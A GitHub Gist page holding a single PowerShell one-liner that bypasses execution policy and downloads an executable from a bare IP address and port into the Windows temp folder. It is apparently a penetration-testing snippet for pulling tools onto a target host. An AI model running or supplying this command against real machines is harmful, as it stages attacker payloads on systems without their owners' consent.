Last active
October 16, 2021 11:33
-
-
Save intrd/585978b815b89dedd774da1b6b8a1535 to your computer and use it in GitHub Desktop.
Powershell WGET one-liner (anyver)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Powershell oneliner wget (anyver) | |
# http://dann.com.br/ | |
@powershell -NoProfile -ExecutionPolicy unrestricted -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.10.10:7000/iw4455.exe', 'C:\windows\temp\iw4455.exe') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment